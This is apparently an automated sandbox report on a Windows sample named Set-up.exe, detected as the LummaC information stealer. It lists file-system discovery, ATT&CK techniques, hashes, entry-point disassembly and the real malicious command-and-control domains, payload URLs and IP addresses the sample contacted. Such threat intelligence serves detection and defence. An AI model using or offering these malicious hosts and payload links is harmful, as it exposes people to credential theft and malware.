Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Directory queried: number of queries: 1001

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1578163081.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 1564, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 Valid Accounts	1 Valid Accounts	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	14 Windows Service	11 Access Token Manipulation	1 DLL Side-Loading	Security Account Manager	21 File and Directory Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	Login Hook	14 Windows Service	1 Valid Accounts	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Access Token Manipulation	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	11%	ReversingLabs

Source	Detection	Scanner	Label
https://jesxterplay.run/os	0%	Avira URL Cloud	safe
https://jesxterplay.run/c	0%	Avira URL Cloud	safe
jesxterplay.run/tuyhd	100%	Avira URL Cloud	malware
https://h1.mockupeastcoast.shop/	100%	Avira URL Cloud	malware
https://jesxterplay.run:443/tuyhd	100%	Avira URL Cloud	malware
https://jesxterplay.run/tuyhde	0%	Avira URL Cloud	safe
https://h1.mockupeastcoast.shop/shark.binj	100%	Avira URL Cloud	malware
https://h1.mockupeastcoast.shop/shark.binoded	100%	Avira URL Cloud	malware
https://jesxterplay.run/	0%	Avira URL Cloud	safe
https://jesxterplay.run/s	0%	Avira URL Cloud	safe
https://jesxterplay.run/tuyhdw	0%	Avira URL Cloud	safe
https://jesxterplay.run/tuyhd	100%	Avira URL Cloud	malware
https://h1.mo	0%	Avira URL Cloud	safe
https://h1.mockupeastcoast.shop/shark.bine32.amsi.csv	100%	Avira URL Cloud	malware
https://jesxterplay.run/tuyhd2	0%	Avira URL Cloud	safe
https://jesxterplay.run/tuyhd?	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.48.38	true	false	high
jesxterplay.run	104.21.48.1	true	true	unknown
h1.mockupeastcoast.shop	89.169.54.153	true	false	high
pki-goog.l.google.com	172.253.124.94	true	false	high
c.pki.goog	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
liftally.top/xasj	false		high
jawdedmirror.run/ewqd	false		high
nighetwhisper.top/lekd	false		high
jesxterplay.run/tuyhd	true	Avira URL Cloud: malware	unknown
salaccgfa.top/gsooz	false		high
changeaie.top/geps	false		high
owlflright.digital/qopy	false		high
https://jesxterplay.run/tuyhd	false	Avira URL Cloud: malware	unknown
lonfgshadow.live/xawi	false		high
zestmodp.top/zeda	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jesxterplay.run/tuyhde	Set-up.exe, 00000000.00000003.1549691901.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1528021047.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1531434618.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jesxterplay.run/os	Set-up.exe, 00000000.00000003.1512532105.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jesxterplay.run/s	Set-up.exe, 00000000.00000003.1512532105.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://h1.mockupeastcoast.shop/	Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jesxterplay.run/	Set-up.exe, 00000000.00000003.1422796019.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1528021047.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jesxterplay.run:443/tuyhd	Set-up.exe, 00000000.00000003.1531434618.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://h1.mockupeastcoast.shop/shark.binoded	Set-up.exe, 00000000.00000002.1577339370.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jesxterplay.run/c	Set-up.exe, 00000000.00000003.1531434618.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549566194.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://h1.mockupeastcoast.shop/shark.binj	Set-up.exe, 00000000.00000002.1577339370.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jesxterplay.run/tuyhdE	Set-up.exe, 00000000.00000003.1531434618.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549566194.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1512532105.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1550004919.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1528021047.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/v20	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jesxterplay.run/tuyhd?	Set-up.exe, 00000000.00000003.1512532105.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://h1.mockupeastcoast.shop/shark.bin	Set-up.exe, 00000000.00000002.1577339370.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577339370.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv209h	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jesxterplay.run/tuyhdw	Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jesxterplay.run/tuyhd2	Set-up.exe, 00000000.00000003.1549691901.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1531434618.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Set-up.exe, 00000000.00000003.1464162643.0000000003E35000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://h1.mo	Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://h1.mockupeastcoast.shop/shark.bine32.amsi.csv	Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	jesxterplay.run	United States		13335	CLOUDFLARENETUS	true
89.169.54.153	h1.mockupeastcoast.shop	Russian Federation		31514	INF-NET-ASRU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1664223
Start date and time:	2025-04-13 20:21:35 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 62 Number of non-executed functions: 207
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 184.28.213.193, 4.175.87.197, 150.171.28.254
Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:22:40	API Interceptor	9x Sleep call for process: Set-up.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	KYL-0242025E.exe	Get hash	malicious	FormBook	Browse	www.6644win.mom/hs6j/
	rMvNfCLq.exe.bin.exe	Get hash	malicious	FormBook	Browse	www.nolae-eu.shop/fgzv/?NL=C/ZTN0ZmEc67T73TXYejzaFfxzsMVB893CCje6nha4rH7EtVcHl81kdLGE91b+66ix1bC8dHSfqorsQFUwI5UDy1LqHAs9Ogp4/HoE/bzWOrp6BQYnBJsbY=&lT=KV6D1Z
	New Bulk Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.eczanem.shop/3ujc/
	SecuriteInfo.com.Win32.DropperX-gen.1559.13899.exe	Get hash	malicious	FormBook	Browse	www.tqzjixmd.biz/1kjg/
	656654564.CMD.cmd	Get hash	malicious	DBatLoader, FormBook	Browse	www.shlomi.app/9rzh/
	gwLioQ23cr.exe	Get hash	malicious	FormBook	Browse	www.meshki-co-uk.shop/gfm6/
	9Kk8DrVSS8.exe	Get hash	malicious	FormBook	Browse	www.ampmplay5000.vip/hig1/
	iQrjSWi4KZ.exe	Get hash	malicious	FormBook	Browse	www.ampmplay5000.vip/hig1/
	2MfZ6FIA41.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/vpbi/
	123-55 Statement.exe	Get hash	malicious	FormBook	Browse	www.uzshou.world/ricr/
89.169.54.153	Set-up_patched.exe	Get hash	malicious	LummaC Stealer	Browse
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pki-goog.l.google.com	92.255.85.2.exe	Get hash	malicious	DcRat	Browse	172.253.124.94
	num.bat	Get hash	malicious	AsyncRAT, DcRat	Browse	74.125.21.94
	unsecapp.exe	Get hash	malicious	Unknown	Browse	74.125.21.94
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, Quasar, Vidar, Xmrig	Browse	173.194.219.94
	3pzDxChUaP.exe	Get hash	malicious	Unknown	Browse	172.217.215.94
	Saturn.exe	Get hash	malicious	Unknown	Browse	74.125.21.94
	Setupx-64.exe	Get hash	malicious	DCRat	Browse	172.217.215.94
	SecuriteInfo.com.Win64.MalwareX-gen.5298.17806.exe	Get hash	malicious	GhostRat	Browse	172.217.215.94
	SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe	Get hash	malicious	DcRat	Browse	64.233.185.94
	2zb8yjqduP.dll	Get hash	malicious	Unknown	Browse	74.125.21.94
jesxterplay.run	Set-up_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
jesxterplay.run	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	OneDriveSetup.exe	Get hash	malicious	Unknown	Browse	217.20.48.24
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.48.37
	yap.bat	Get hash	malicious	Koadic	Browse	217.20.48.22
	Rd_client_w_a_s_d_patched.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.55.20
	PA.bin.exe	Get hash	malicious	Unknown	Browse	217.20.51.39
	IMSoftware{Launcher}3.21.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.55.21
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	217.20.48.23
	launch3r-v2.2.2.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.55.34
	SecuriteInfo.com.Trojan.Heur.TP.RuW@bOo3uBfc.2836.5163.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.55.22
	SecuriteInfo.com.Win32.MalwareX-gen.12458.14123.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.48.39
h1.mockupeastcoast.shop	Set-up_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.62.250
	setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.62.250

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	nabarm7.elf	Get hash	malicious	Unknown	Browse	104.30.121.67
	fwegregteht.dll.dll	Get hash	malicious	RHADAMANTHYS	Browse	162.159.200.123
	arm.elf	Get hash	malicious	Unknown	Browse	104.30.121.61
	mips.elf	Get hash	malicious	Unknown	Browse	104.27.68.60
	IP.exe	Get hash	malicious	Unknown	Browse	172.67.167.249
	nabmips.elf	Get hash	malicious	Unknown	Browse	198.41.208.149
	resgod.arm5.elf	Get hash	malicious	Mirai	Browse	162.159.107.77
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, Quasar, Vidar, Xmrig	Browse	104.21.85.126
	documentoytarjetapdf_8541963143.js	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	172.64.41.3
	build.msi	Get hash	malicious	Unknown	Browse	104.21.9.249
INF-NET-ASRU	Set-up_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	resgod.sh4.elf	Get hash	malicious	Mirai	Browse	83.217.197.148
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	89.169.54.153
	utorrent_installer.exe	Get hash	malicious	Unknown	Browse	83.217.202.106

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random.exe	Get hash	malicious	Amadey, LummaC Stealer, Quasar, Vidar, Xmrig	Browse	104.21.48.1
	Set-up_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	1st.Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	Set-Up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	activate.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.859157588569507
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	1'104'384 bytes
MD5:	26e8e71a6a3631d980fe7c98883cfe49
SHA1:	ff8fc1599e1c745c52a704b71884a10c55256742
SHA256:	7befa4a4397e54b7e5116de0f3238a963e84411145a299186c6885be9929d8ce
SHA512:	9891810a2d6655c929564621549ec9db112125384bc2a0cd3120bfaed16ed76fe7b8d6a051361cf4fbe2514418cefad2261a4b0ba667701e9524ecaf5b1b5a55
SSDEEP:	12288:J/J/67vYjaBM3o+gySwqPm4uu+jOPa8t80bPhomJIcvtR7Zz0MQ:CjYGSgQqPjuu9t80bPlecr
TLSH:	863519B43BE398ACC2795A70191CA748A5D85D1E9B9095CBE158385CEE3C3F0293FD39
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t.............g.......g.......g...A.......................t...T=......T=..............T=......Rich...........................

File Icon


Icon Hash:	4570d4d4e068c6f8

Static PE Info

General

Entrypoint:	0x43078a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x56B09B7B [Tue Feb 2 12:05:15 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	73d48370952599e4574abf4e75169442

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007F7BB8E7875Ah
jmp 00007F7BB8E6E080h
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7BB8E6E264h
mov dword ptr [esi], 00454B14h
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7BB8E6E264h
mov dword ptr [esi], 00454B14h
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7BB8E6E2A5h
mov dword ptr [esi], 00454AFCh
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
